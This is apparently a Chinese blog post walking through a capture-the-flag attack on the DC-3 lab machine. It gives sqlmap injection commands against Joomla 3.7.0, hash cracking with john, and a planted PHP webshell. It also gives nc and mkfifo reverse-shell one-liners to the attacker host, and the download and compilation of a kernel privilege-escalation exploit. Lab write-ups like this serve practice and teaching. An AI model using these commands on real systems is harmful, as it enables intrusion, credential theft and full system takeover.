DC-3

最新推荐文章于 2022-11-27 20:36:48 发布
最新推荐文章于 2022-11-27 20:36:48 发布
阅读量279 收藏
点赞数
分类专栏: DC靶机 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50258818/article/details/116385448
版权

DC-3

nmap扫出靶机及其端口,框架,而后在浏览器上访问。

提示只有一个flag,且需要root权限。

框架为joomla,在msfconsole上找到对应模块逐一尝试,没能成功,但成功找到了对应版本号3.7.0

在网络上继续搜索相应漏洞,发现该版本有对应的sql注入漏洞,回到浏览器进行尝试,而后注入得到数据库名joomladb。

再次使用joomscan工具进行扫描

perl joomscan.pl --url http://192.168.241.23

在这里插入图片描述

发现一些页面。

寻找对应版本的模块。

searchsploit joomla 3.7
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

复制sql注入命令(这里ip地址变了是因为中途断网了,后面换了一个wifi)

sqlmap -u "http://192.168.101.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]#查询数据库
sqlmap -u "http://192.168.101.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]#查询表名
sqlmap -u "http://192.168.101.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]#查询表中所有列

查询到用户为admin,密码为一串hash值,那么对hash值进行爆破

vim hashpassword.txt#将hash值写入该文件
john hashpassword.txt#爆破hash值

而后获得密码snoopy,进行登录,并找到模板相关的页面,发现可以创建文件,直接给他来个一句话木马。

在这里插入图片描述

那么我们现在需要的就是找到shell.php的位置并进行连接。

之前使用joomscan扫出的目录里有templates,前面的administrator应该只是登陆页面,所以猜测真正的文件路径是http://192.168.101.23/templates/beez3/html/shell.php (beez3的猜测是因为进入文件夹的时候经过了)。

蚁剑连接,但蚁剑的连接只是单向shell,我们需要进行交互式的shell,这样才能提到root权限。

nc lvvp 1234#kali本机开启监听
nc -e /bin/bash 192.168.101.16 1234#靶机连接kali
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.101.16 4444 >/tmp/f#靶机输入,反弹shell完成。

尝试SUID提权和git提权,但都失败了,之前登陆的网站中,有关于网站使用系统的信息,其中Ubuntu的版本是16.04

可以试着找找该版本的漏洞

searchsploit Ubuntu 16.04

在这里插入图片描述

这里选择39772进行提权,(该文件说明提到了可以用于获得root权限)s。

在这里插入图片描述

下载payload

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
cp 39772.zip /var/www/html
service apache2 start

而后靶机就可以从kali这下载了

wget http://192.168.101.16/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar

再从主机进行操作

cd 39772
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput#到这里已经获得了root权限
cd /root
cat the-flag.txt

在这里插入图片描述

silent-light
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-3超声操作手册
03-25
DC-3超声操作手册 DC-3/DC-3T Diagnostic Ultrasound System Operator’s Manual
dc-3
03-22
dc-3
DC3 是基于 Spring Cloud 的开源可分布式物联网 (IOT) 平台
05-03
功能设计,定位目标 可伸缩:水平可伸缩的平台,构建使用领先的 Spring Cloud 开源技术; 容错:没有单点故障弱,集群中的每个节点是相同的; 健壮和高效:单一服务器节点可以处理甚至数百成千上万的设备根据用例; 可定制:添加新的设备协议,并注册到服务中心; 跨平台:使用 Java 环境可异地、分布式多平台部署; 自主可控:私有云、公有云、边缘部署; 完善性:设备快速接入、注册、权限校验; 安全(开发中...):数据加密传输(mqtt 驱动已实现数据加密传输); 多租户:命名空间,多租户化; 云原生:Kubernetes; 容器化:Docker。
DC靶机系列——DC3练习
shenpanzhimao的博客
03-01 1898
DC靶机系列——DC3 靶机地址: DC-3 1、Recon阶段 1.nmap扫描网段 得到目标 192.168.99.102 开启端口 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:1C:53:6A 显然是一个网页渗透 2.浏览器...
DC-3 步骤
底层社会中的弱智
09-18 1375
确认局域网中目标主机IP 确认目标开启的端口 确认IP为192.168.0.113 端口信息为:80端口 信息收集: 看得出使用joomla框架 针对性扫描 joomscan 确认版本号以及后台登陆页面,查到公开漏洞信息 存在注入,使用sqlmap进行注入先看看是否可以直接获取osshell以及sqlshell 卒 只能一步一步来 数据库 joomladb 表:#_users 选中username和password 查看密码 尝试使用john.
vulnhub之dc3
qq_54030686的博客
06-08 267
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集).zip
05-31
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集) Component Count : 8 Component Name ----------------------------------------------- DC-002 DC-003 DC-003A DC-005 DC-005P DC-012 DC-...
39772.zip靶机所用文件66
08-11
dc3靶机所用文件
高清RAW图片,供Lrfans练习.zip
03-20
高清RAW图片,供Lrfans练习,未经过任何软件处理过的原始照片,可以用于Potoshop学习作为原素材使用
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
.Net Core IIS部署安装文件.zip
04-22
.netcore iis部署文件,其中包含两个安装包dotnet-hosting-2.2.0-win.exe和DotNetCore.1.0.4_1.1.1-WindowsHosting,安装后.net core项目就可以在iis中部署了。
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
DC-3靶机
m0_62094846的博客
02-20 3133
ifconfig nmap 192.168.61.0/24 nmap -A -p- 192.168.131 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等 whatweb http://192.168.61.131 发现靶机使用Joomla内容管理系统 使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等等 扫描后得知Joomla版本3.7.0,管理员登录页面,及一些可以访问的网站目录 joomscan --u 192.168.61
DC-3靶机 渗透测试
她叫常玉莹
07-18 2885
DC-3查看靶机mac地址获取IP地址NmapJooScansqlmapjohn上传Webshellnc反弹提权 DC-3只有一个目标获得root权限,拿到flag。 查看靶机mac地址 00:0C:29:0D:D3:78 获取IP地址 使用arp-scan扫描 得知靶机IP地址 192.168.0.104 Nmap 使用nmap扫描收集靶机信息 nmap -sV -p- 192.168.0.104 看到靶机开放了80端口,访问一下 http://192.168.0.104:80 在wappaly
kali渗透之DC-3
最新发布
余笙.'的博客
11-27 1056
kali渗透DC-3靶机
DC系列(3)DC-3靶机渗透
Nikris的博客
01-10 1462
DC-3
高频隔离软开关DC-DC变换技术研究
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值